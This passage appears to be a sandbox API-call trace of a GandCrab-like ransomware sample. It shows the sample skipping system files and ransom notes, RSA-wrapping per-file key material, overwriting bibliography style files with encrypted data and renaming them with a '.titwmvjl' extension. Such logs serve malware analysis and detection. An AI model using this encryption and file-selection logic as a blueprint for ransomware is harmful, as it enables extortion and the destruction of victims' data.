(lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\IEEE2006OfficeOnline.xsl") returned 91 [0071.345] lstrcmpiW (lpString1="IEEE2006OfficeOnline.xsl", lpString2="desktop.ini") returned 1 [0071.345] lstrcmpiW (lpString1="IEEE2006OfficeOnline.xsl", lpString2="autorun.inf") returned 1 [0071.345] lstrcmpiW (lpString1="IEEE2006OfficeOnline.xsl", lpString2="ntuser.dat") returned -1 [0071.345] lstrcmpiW (lpString1="IEEE2006OfficeOnline.xsl", lpString2="iconcache.db") returned 1 [0071.345] lstrcmpiW (lpString1="IEEE2006OfficeOnline.xsl", lpString2="bootsect.bak") returned 1 [0071.345] lstrcmpiW (lpString1="IEEE2006OfficeOnline.xsl", lpString2="boot.ini") returned 1 [0071.345] lstrcmpiW (lpString1="IEEE2006OfficeOnline.xsl", lpString2="ntuser.dat.log") returned -1 [0071.345] lstrcmpiW (lpString1="IEEE2006OfficeOnline.xsl", lpString2="thumbs.db") returned -1 [0071.345] lstrcmpiW (lpString1="IEEE2006OfficeOnline.xsl", lpString2="TITWMVJL-DECRYPT.txt") returned -1 [0071.345] lstrcmpiW (lpString1="IEEE2006OfficeOnline.xsl", lpString2="TITWMVJL-DECRYPT.html") returned -1 [0071.345] lstrcmpiW (lpString1="IEEE2006OfficeOnline.xsl", lpString2="KRAB-DECRYPT.html") returned -1 [0071.345] lstrcmpiW (lpString1="IEEE2006OfficeOnline.xsl", lpString2="CRAB-DECRYPT.html") returned 1 [0071.345] lstrcmpiW (lpString1="IEEE2006OfficeOnline.xsl", lpString2="KRAB-DECRYPT.txt") returned -1 [0071.345] lstrcmpiW (lpString1="IEEE2006OfficeOnline.xsl", lpString2="CRAB-DECRYPT.txt") returned 1 [0071.345] lstrcmpiW (lpString1="IEEE2006OfficeOnline.xsl", lpString2="ntldr") returned -1 [0071.345] lstrcmpiW (lpString1="IEEE2006OfficeOnline.xsl", lpString2="NTDETECT.COM") returned -1 [0071.345] lstrcmpiW (lpString1="IEEE2006OfficeOnline.xsl", lpString2="Bootfont.bin") returned 1 [0071.345] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\IEEE2006OfficeOnline.xsl") returned 91 [0071.345] lstrlenW (lpString=".xsl") returned 4 [0071.345] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0071.345] wsprintfW (in: param_1=0x2630000, param_2="%s " | out: param_1=".xsl ") returned 5 [0071.345] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0071.345] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0071.346] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\IEEE2006OfficeOnline.xsl" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\bibliography\\style\\ieee2006officeonline.xsl"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x2cc [0071.346] SetFilePointerEx (in: hFile=0x2cc, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0071.346] ReadFile (in: hFile=0x2cc, lpBuffer=0x2630000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x259ea20, lpOverlapped=0x0 | out: lpBuffer=0x2630000*, lpNumberOfBytesRead=0x259ea20*=0x21c, lpOverlapped=0x0) returned 1 [0071.358] SetFilePointerEx (in: hFile=0x2cc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0071.359] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0071.359] CryptAcquireContextW (in: phProv=0x259e950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259e950*=0x4cdb38) returned 1 [0071.359] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x2640000 [0071.359] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0071.360] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0071.360] CryptGenRandom (in: hProv=0x4cdb38, dwLen=0x20, pbBuffer=0x259e9dc | out: pbBuffer=0x259e9dc) returned 1 [0071.360] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0071.360] CryptReleaseContext (hProv=0x4cdb38, dwFlags=0x0) returned 1 [0071.360] VirtualFree (lpAddress=0x2640000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0071.360] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0071.360] CryptAcquireContextW (in: phProv=0x259e950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259e950*=0x4cdb38) returned 1 [0071.360] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x2640000 [0071.361] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0071.361] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0071.361] CryptGenRandom (in: hProv=0x4cdb38, dwLen=0x8, pbBuffer=0x259e9fc | out: pbBuffer=0x259e9fc) returned 1 [0071.361] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0071.361] CryptReleaseContext (hProv=0x4cdb38, dwFlags=0x0) returned 1 [0071.361] VirtualFree (lpAddress=0x2640000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0071.361] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0071.361] CryptAcquireContextW (in: phProv=0x259e944, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259e944*=0x4cdb38) returned 1 [0071.362] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0071.362] CryptImportKey (in: hProv=0x4cdb38, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259e948 | out: phKey=0x259e948*=0x5037f8) returned 1 [0071.362] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0071.362] CryptGetKeyParam (in: hKey=0x5037f8, dwParam=0x8, pbData=0x259e93c, pdwDataLen=0x259e940, dwFlags=0x0 | out: pbData=0x259e93c*=0x800, pdwDataLen=0x259e940*=0x4) returned 1 [0071.362] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0071.362] CryptEncrypt (in: hKey=0x5037f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2630000*, pdwDataLen=0x259e974*=0xc8, dwBufLen=0x100 | out: pbData=0x2630000*, pdwDataLen=0x259e974*=0x100) returned 1 [0071.362] GetLastError () returned 0x0 [0071.362] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0071.363] CryptDestroyKey (hKey=0x5037f8) returned 1 [0071.363] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0071.363] CryptReleaseContext (hProv=0x4cdb38, dwFlags=0x0) returned 1 [0071.363] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0071.363] CryptAcquireContextW (in: phProv=0x259e944, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259e944*=0x4cdb38) returned 1 [0071.363] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0071.363] CryptImportKey (in: hProv=0x4cdb38, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259e948 | out: phKey=0x259e948*=0x503478) returned 1 [0071.363] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0071.364] CryptGetKeyParam (in: hKey=0x503478, dwParam=0x8, pbData=0x259e93c, pdwDataLen=0x259e940, dwFlags=0x0 | out: pbData=0x259e93c*=0x800, pdwDataLen=0x259e940*=0x4) returned 1 [0071.364] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0071.364] CryptEncrypt (in: hKey=0x503478, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2630100*, pdwDataLen=0x259e974*=0xc8, dwBufLen=0x100 | out: pbData=0x2630100*, pdwDataLen=0x259e974*=0x100) returned 1 [0071.364] GetLastError () returned 0x0 [0071.364] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0071.364] CryptDestroyKey (hKey=0x503478) returned 1 [0071.364] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0071.364] CryptReleaseContext (hProv=0x4cdb38, dwFlags=0x0) returned 1 [0071.364] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x2640000 [0071.364] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x2750000 [0071.365] ReadFile (in: hFile=0x2cc, lpBuffer=0x2640000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x259ea20, lpOverlapped=0x0 | out: lpBuffer=0x2640000*, lpNumberOfBytesRead=0x259ea20*=0x47e7d, lpOverlapped=0x0) returned 1 [0071.397] SetFilePointerEx (in: hFile=0x2cc, liDistanceToMove=0xfffb8183, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0071.397] WriteFile (in: hFile=0x2cc, lpBuffer=0x2750000*, nNumberOfBytesToWrite=0x47e7d, lpNumberOfBytesWritten=0x259ea04, lpOverlapped=0x0 | out: lpBuffer=0x2750000*, lpNumberOfBytesWritten=0x259ea04*=0x47e7d, lpOverlapped=0x0) returned 1 [0071.407] SetFilePointerEx (in: hFile=0x2cc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0071.407] WriteFile (in: hFile=0x2cc, lpBuffer=0x2630000*, nNumberOfBytesToWrite=0x21c, lpNumberOfBytesWritten=0x259ea04, lpOverlapped=0x0 | out: lpBuffer=0x2630000*, lpNumberOfBytesWritten=0x259ea04*=0x21c, lpOverlapped=0x0) returned 1 [0071.410] VirtualFree (lpAddress=0x2640000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0071.414] VirtualFree (lpAddress=0x2750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0071.415] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0071.415] CloseHandle (hObject=0x2cc) returned 1 [0071.420] MoveFileExW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\IEEE2006OfficeOnline.xsl" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\bibliography\\style\\ieee2006officeonline.xsl"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\IEEE2006OfficeOnline.xsl.titwmvjl" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\bibliography\\style\\ieee2006officeonline.xsl.titwmvjl"), dwFlags=0x1) returned 1 [0071.420] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0071.421] FindNextFileW (in: hFindFile=0x5033b8, lpFindFileData=0x259ead4 | out: lpFindFileData=0x259ead4) returned 1 [0071.421] lstrcmpW (lpString1="ISO690.XSL", lpString2=".") returned 1 [0071.421] lstrcmpW (lpString1="ISO690.XSL", lpString2="..") returned 1 [0071.421] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\", lpString2="ISO690.XSL" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\ISO690.XSL") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\ISO690.XSL" [0071.421] lstrlenW (lpString=".titwmvjl") returned 9 [0071.421] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\ISO690.XSL") returned 77 [0071.421] VirtualAlloc (lpAddress=0x0, dwSize=0xda, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0071.421] wsprintfW (in: param_1=0x25d0000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\ISO690.XSL.titwmvjl") returned 86 [0071.421] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\ISO690.XSL") returned 77 [0071.421] lstrlenW (lpString=".XSL") returned 4 [0071.421] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0071.421] wsprintfW (in: param_1=0x2630000, param_2="%ws " | out: param_1=".XSL ") returned 5 [0071.421] lstrcmpiW (lpString1=".XSL", lpString2=".titwmvjl") returned 1 [0071.421] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0071.422] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\ISO690.XSL") returned 77 [0071.422] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\ISO690.XSL") returned 77 [0071.422] lstrcmpiW (lpString1="ISO690.XSL", lpString2="desktop.ini") returned 1 [0071.422] lstrcmpiW (lpString1="ISO690.XSL", lpString2="autorun.inf") returned 1 [0071.422] lstrcmpiW (lpString1="ISO690.XSL", lpString2="ntuser.dat") returned -1 [0071.422] lstrcmpiW (lpString1="ISO690.XSL", lpString2="iconcache.db") returned 1 [0071.422] lstrcmpiW (lpString1="ISO690.XSL", lpString2="bootsect.bak") returned 1 [0071.422] lstrcmpiW (lpString1="ISO690.XSL", lpString2="boot.ini") returned 1 [0071.422] lstrcmpiW (lpString1="ISO690.XSL", lpString2="ntuser.dat.log") returned -1 [0071.422] lstrcmpiW (lpString1="ISO690.XSL", lpString2="thumbs.db") returned -1 [0071.422] lstrcmpiW (lpString1="ISO690.XSL", lpString2="TITWMVJL-DECRYPT.txt") returned -1 [0071.422] lstrcmpiW (lpString1="ISO690.XSL", lpString2="TITWMVJL-DECRYPT.html") returned -1 [0071.422] lstrcmpiW (lpString1="ISO690.XSL", lpString2="KRAB-DECRYPT.html") returned -1 [0071.422] lstrcmpiW (lpString1="ISO690.XSL", lpString2="CRAB-DECRYPT.html") returned 1 [0071.422] lstrcmpiW (lpString1="ISO690.XSL", lpString2="KRAB-DECRYPT.txt") returned -1 [0071.422] lstrcmpiW (lpString1="ISO690.XSL", lpString2="CRAB-DECRYPT.txt") returned 1 [0071.422] lstrcmpiW (lpString1="ISO690.XSL", lpString2="ntldr") returned -1 [0071.422] lstrcmpiW (lpString1="ISO690.XSL", lpString2="NTDETECT.COM") returned -1 [0071.422] lstrcmpiW (lpString1="ISO690.XSL", lpString2="Bootfont.bin") returned 1 [0071.422] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\ISO690.XSL") returned 77 [0071.422] lstrlenW (lpString=".XSL") returned 4 [0071.422] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0071.422] wsprintfW (in: param_1=0x2630000, param_2="%s " | out: param_1=".XSL ") returned 5 [0071.422] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0071.422] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0071.423] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\ISO690.XSL" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\bibliography\\style\\iso690.xsl"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x2cc [0071.423] SetFilePointerEx (in: hFile=0x2cc, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0071.423] ReadFile (in: hFile=0x2cc, lpBuffer=0x2630000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x259ea20, lpOverlapped=0x0 | out: lpBuffer=0x2630000*, lpNumberOfBytesRead=0x259ea20*=0x21c, lpOverlapped=0x0) returned 1 [0071.435] SetFilePointerEx (in: hFile=0x2cc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0071.435] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0071.435] CryptAcquireContextW (in: phProv=0x259e950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259e950*=0x4cdb38) returned 1 [0071.435] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x2640000 [0071.436] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0071.436] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0071.436] CryptGenRandom (in: hProv=0x4cdb38, dwLen=0x20, pbBuffer=0x259e9dc | out: pbBuffer=0x259e9dc) returned 1 [0071.436] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0071.436] CryptReleaseContext (hProv=0x4cdb38, dwFlags=0x0) returned 1 [0071.436] VirtualFree (lpAddress=0x2640000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0071.436] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0071.436] CryptAcquireContextW (in: phProv=0x259e950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259e950*=0x4cdb38) returned 1 [0071.437] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x2640000 [0071.437] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0071.437] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0071.437] CryptGenRandom (in: hProv=0x4cdb38, dwLen=0x8, pbBuffer=0x259e9fc | out: pbBuffer=0x259e9fc) returned 1 [0071.437] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0071.437] CryptReleaseContext (hProv=0x4cdb38, dwFlags=0x0) returned 1 [0071.437] VirtualFree (lpAddress=0x2640000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0071.438] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0071.438] CryptAcquireContextW (in: phProv=0x259e944, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259e944*=0x4cdb38) returned 1 [0071.438] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0071.438] CryptImportKey (in: hProv=0x4cdb38, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259e948 | out: phKey=0x259e948*=0x5037f8) returned 1 [0071.438] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0071.438] CryptGetKeyParam (in: hKey=0x5037f8, dwParam=0x8, pbData=0x259e93c, pdwDataLen=0x259e940, dwFlags=0x0 | out: pbData=0x259e93c*=0x800, pdwDataLen=0x259e940*=0x4) returned 1 [0071.438] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0071.438] CryptEncrypt (in: hKey=0x5037f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2630000*, pdwDataLen=0x259e974*=0xc8, dwBufLen=0x100 | out: pbData=0x2630000*, pdwDataLen=0x259e974*=0x100) returned 1 [0071.439] GetLastError () returned 0x0 [0071.439] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0071.439] CryptDestroyKey (hKey=0x5037f8) returned 1 [0071.439] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0071.439] CryptReleaseContext (hProv=0x4cdb38, dwFlags=0x0) returned 1 [0071.439] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0071.439] CryptAcquireContextW (in: phProv=0x259e944, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259e944*=0x4cdb38) returned 1 [0071.440] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0071.440] CryptImportKey (in: hProv=0x4cdb38, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259e948 | out: phKey=0x259e948*=0x5033f8) returned 1 [0071.440] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0071.440] CryptGetKeyParam (in: hKey=0x5033f8, dwParam=0x8, pbData=0x259e93c, pdwDataLen=0x259e940, dwFlags=0x0 | out: pbData=0x259e93c*=0x800, pdwDataLen=0x259e940*=0x4) returned 1 [0071.440] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0071.440] CryptEncrypt (in: hKey=0x5033f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2630100*, pdwDataLen=0x259e974*=0xc8, dwBufLen=0x100 | out: pbData=0x2630100*, pdwDataLen=0x259e974*=0x100) returned 1 [0071.441] GetLastError () returned 0x0 [0071.441] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0071.441] CryptDestroyKey (hKey=0x5033f8) returned 1 [0071.441] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0071.441] CryptReleaseContext (hProv=0x4cdb38, dwFlags=0x0) returned 1 [0071.441] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x2640000 [0071.441] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x2750000 [0071.441] ReadFile (in: hFile=0x2cc, lpBuffer=0x2640000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x259ea20, lpOverlapped=0x0 | out: lpBuffer=0x2640000*, lpNumberOfBytesRead=0x259ea20*=0x42132, lpOverlapped=0x0) returned 1 [0071.457] SetFilePointerEx (in: hFile=0x2cc, liDistanceToMove=0xfffbdece, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0071.457] WriteFile (in: hFile=0x2cc, lpBuffer=0x2750000*, nNumberOfBytesToWrite=0x42132, lpNumberOfBytesWritten=0x259ea04, lpOverlapped=0x0 | out: lpBuffer=0x2750000*, lpNumberOfBytesWritten=0x259ea04*=0x42132, lpOverlapped=0x0) returned 1 [0071.460] SetFilePointerEx (in: hFile=0x2cc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0071.460] WriteFile (in: hFile=0x2cc, lpBuffer=0x2630000*, nNumberOfBytesToWrite=0x21c, lpNumberOfBytesWritten=0x259ea04, lpOverlapped=0x0 | out: lpBuffer=0x2630000*, lpNumberOfBytesWritten=0x259ea04*=0x21c, lpOverlapped=0x0) returned 1 [0071.461] VirtualFree (lpAddress=0x2640000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0071.465] VirtualFree (lpAddress=0x2750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0071.466] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0071.466] CloseHandle (hObject=0x2cc) returned 1 [0071.472] MoveFileExW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\ISO690.XSL" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\bibliography\\style\\iso690.xsl"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\ISO690.XSL.titwmvjl" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\bibliography\\style\\iso690.xsl.titwmvjl"), dwFlags=0x1) returned 1 [0071.473] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0071.473] FindNextFileW (in: hFindFile=0x5033b8, lpFindFileData=0x259ead4 | out: lpFindFileData=0x259ead4) returned 1 [0071.473] lstrcmpW (lpString1="ISO690Nmerical.XSL", lpString2=".") returned 1 [0071.473] lstrcmpW (lpString1="ISO690Nmerical.XSL", lpString2="..") returned 1 [0071.473] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\", lpString2="ISO690Nmerical.XSL" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\ISO690Nmerical.XSL") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\ISO690Nmerical.XSL" [0071.473] lstrlenW (lpString=".titwmvjl") returned 9 [0071.473] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\ISO690Nmerical.XSL") returned 85 [0071.473] VirtualAlloc (lpAddress=0x0, dwSize=0xea, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0071.473] wsprintfW (in: param_1=0x25d0000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\ISO690Nmerical.XSL.titwmvjl") returned 94 [0071.473] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\ISO690Nmerical.XSL") returned 85 [0071.473] lstrlenW (lpString=".XSL") returned 4 [0071.473] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0071.473] wsprintfW (in: param_1=0x2630000, param_2="%ws " | out: param_1=".XSL ") returned 5 [0071.473] lstrcmpiW (lpString1=".XSL", lpString2=".titwmvjl") returned 1 [0071.473] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0071.474] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\ISO690Nmerical.XSL") returned 85 [0071.474] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\ISO690Nmerical.XSL") returned 85 [0071.474] lstrcmpiW (lpString1="ISO690Nmerical.XSL", lpString2="desktop.ini") returned 1 [0071.474] lstrcmpiW (lpString1="ISO690Nmerical.XSL", lpString2="autorun.inf") returned 1 [0071.474] lstrcmpiW (lpString1="ISO690Nmerical.XSL", lpString2="ntuser.dat") returned -1 [0071.474] lstrcmpiW (lpString1="ISO690Nmerical.XSL", lpString2="iconcache.db") returned 1 [0071.474] lstrcmpiW (lpString1="ISO690Nmerical.XSL", lpString2="bootsect.bak") returned 1 [0071.474] lstrcmpiW (lpString1="ISO690Nmerical.XSL", lpString2="boot.ini") returned 1 [0071.474] lstrcmpiW (lpString1="ISO690Nmerical.XSL", lpString2="ntuser.dat.log") returned -1 [0071.474] lstrcmpiW (lpString1="ISO690Nmerical.XSL", lpString2="thumbs.db") returned -1 [0071.474] lstrcmpiW (lpString1="ISO690Nmerical.XSL", lpString2="TITWMVJL-DECRYPT.txt") returned -1 [0071.474] lstrcmpiW (lpString1="ISO690Nmerical.XSL", lpString2="TITWMVJL-DECRYPT.html") returned -1 [0071.474] lstrcmpiW (lpString1="ISO690Nmerical.XSL", lpString2="KRAB-DECRYPT.html") returned -1 [0071.474] lstrcmpiW (lpString1="ISO690Nmerical.XSL", lpString2="CRAB-DECRYPT.html") returned 1 [0071.474] lstrcmpiW (lpString1="ISO690Nmerical.XSL", lpString2="KRAB-DECRYPT.txt") returned -1 [0071.474] lstrcmpiW (lpString1="ISO690Nmerical.XSL", lpString2="CRAB-DECRYPT.txt") returned 1 [0071.474] lstrcmpiW (lpString1="ISO690Nmerical.XSL", lpString2="ntldr") returned -1 [0071.474] lstrcmpiW (lpString1="ISO690Nmerical.XSL", lpString2="NTDETECT.COM") returned -1 [0071.474] lstrcmpiW (lpString1="ISO690Nmerical.XSL", lpString2="Bootfont.bin") returned 1 [0071.474] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\ISO690Nmerical.XSL") returned 85 [0071.474] lstrlenW (lpString=".XSL") returned 4 